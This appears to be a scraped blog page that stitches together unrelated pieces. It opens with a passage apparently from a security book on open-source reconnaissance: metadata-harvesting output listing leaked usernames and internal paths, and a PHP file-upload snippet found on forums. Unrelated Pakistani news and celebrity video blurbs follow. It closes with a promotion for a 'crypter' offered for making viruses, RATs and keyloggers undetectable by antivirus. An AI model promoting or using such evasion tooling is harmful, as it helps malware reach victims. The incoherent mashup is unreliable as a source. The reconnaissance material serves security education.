[+] Total results in google: 1500
[+] Limit: 3
[ 1/3 ] http://www.example.com/english/lic/gl_app1.doc
[ 2/3 ] http://www.example.com/english/lic/gl_app2.doc
[ 3/3 ] http://www.example.com/english/lic/gl_app3.doc
[+] Searching in example.com for: xls
[+] Total results in google: 20
[+] Limit: 3
[ 1/3 ] http://www.example.com/english/lic/gl_app1.xls
[ 2/3 ] http://www.example.com/english/lic/gl_app2.xls
[ 3/3 ] http://www.example.com/english/lic/gl_app3.xls
[+] Searching in example.com for: ppt
[+] Total results in google: 60
[+] Limit: 3
[ 1/3 ] http://www.example.com/english/lic/gl_app1.ppt
[ 2/3 ] http://www.example.com/english/lic/gl_app1.ppt
[ 3/3 ] http://www.example.com/english/lic/gl_app1.ppt
[+] Searching in example.com for: sdw
[+] Total results in google: 0
[+] Searching in example.com for: mdb
[+] Total results in google: 0
[+] Searching in example.com for: sdc
[+] Total results in google: 0
[+] Searching in example.com for: odp
[+] Total results in google: 0
[+] Searching in example.com for: ods
[+] Total results in google: 0
Usernames found:
================
rmiyazaki
tyamanda
hlee
akarnik
April Jacobs
Rwood
Amatsuda
Dmaha
Dock, Matt
Paths found:
============
C:\WINNT\Profiles\Dmaha\
C:\TEMP\Dmaha\
C:\Program Files\Microsoft Office\Templates|Presentation Designs\example
C:\WINNT\Profiles\Rwood
[+] Process finished
Figure 1-6. SEAT using 15 threads, searching for vulnerabilities using multiple search engines
Note
The publicly available Python script metagoofil.py aids in searching, gathering, and extracting metadata from documents. It is available from http://www.edge-security.com/metagoofil.php.
Searching for Source Code
Developers will often post code on public forums when they discover a bug they cannot solve. Too often, these developers will post code without redacting it in any way. It is unsettling how often these forums display code that clearly belongs to a specific organization.
Information such as the developer’s name, internal comments, code descriptions, and organizational ownership are among the items you can find in source code that is posted on public forums on the Internet.
Using Google, it is trivial to find some of this code in a short period of time. Using search terms such as “here is the code” and “here is the exact code” will return many results. Here is a code snippet that we found using Google (the code has been redacted):
<?php
$error = ""; // Set a variable that will be used for errors
$sendTo = ""; // Set a variable that will be used for emailing
// Form is submitted
if(isset($_POST['upload']) && $_POST['upload'] == 'Upload File')
{
$whereto = $_POST['where']; // Gets post value from select menu
// Gets file value from file upload input
$whatfile = $_FILES['uploadedfile']['name'];
// This is the subject that will appear in the email
$subject = "File uploaded to ". $whereto ." directory";
$from = "FTP UPLOAD <noreply@redacted.com>";
// Checks to see if $whereto is empty, if so echo error
if(empty($whereto))
{
$error = "You need to choose a directory.<br />";
}
// Checks to see if file input field is empty, if so throw an error
if($whatfile == NULL) {
$error .= "You need to choose a file.";
}
//if no errors so far then continue uploading
if(!empty($whereto) && $whatfile != NULL) {
$target_path = "$whereto/"; // The directory the file will be placed
...
This code snippet describes upload functionality that is on a web server. An attacker can use this code to reverse-engineer how to get a file into a different directory, or how to bypass the security mechanisms that are in place.
Monday, 20 January 2014
Victim Of Rawalpindi Bomb Blast
Father of a person who died in Rawalpindi bomb blast can’t control his emotions while talking to media. Watch the video for more details.
Salman Khan Calls Narendra Modi A Good Man Posted by Raza Khan on Tuesday, January 21, 2014
Salman Khan, Bollywood film star went to Ahmedabad from Delhi to enjoy kite flying with BJP Narendra Modi. During press conference, he called Narendra Modi as a good man. Watch the video for more details.
A Big Slap on Pakistan Idol Judges by Amanat Ali and Maria Meer
Maria Meer, who appeared as a contestant in the inaugural edition of Pakistan Idol, was rejected by the jury reasoning that she did not have a strong voice. On the contrary, a number of music critics praised her and social media made it a huge story. As a result, she was signed by Amanat Ali, a talented young musician and singer, and proved that Pakistan Idol’s jury knows nothing about music. Watch the complete video and listen to Maria Meer after 5:45 in the timeline.
Aegis Crypter 2.4 Full Version
Aegis Crypter 2.4 Full Version
Aegis Crypter can be used to encrypt viruses,RAT,keyloggers,spywares etc to make them undetectable from antiviruses.When these exe files are encrypted with Fud crypters they become undetectable with antiviruses.
To Know the further information and installation of Aegis Crypter 2.4 visit to: http://www.aegiscrypter.com/
.jpg)
Subscribe to:
Posts (Atom)